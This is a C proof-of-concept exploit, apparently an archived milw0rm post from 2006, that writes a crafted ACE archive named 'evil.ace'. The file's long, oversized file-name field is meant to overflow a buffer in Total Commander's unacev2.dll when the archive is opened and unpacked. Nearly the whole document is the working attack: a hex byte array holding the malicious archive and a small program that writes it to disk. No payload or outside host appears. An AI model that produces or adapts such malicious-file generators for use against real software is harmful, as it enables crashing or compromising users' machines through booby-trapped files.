/*
--
/\
\/ Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\ by Darkeagle of Unl0ck Research Team
\/ http://unl0ck.net
/\
\/ when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>
unsigned char evil_ace[] =
"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14"
"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A"
"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52"
"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF"
"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x2E\x74\x78\x74";
int main()
{
FILE *ace;
ace = fopen("evil.ace", "w+b");
fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
fclose(ace);
return 0;
}
// milw0rm.com [2006-04-02]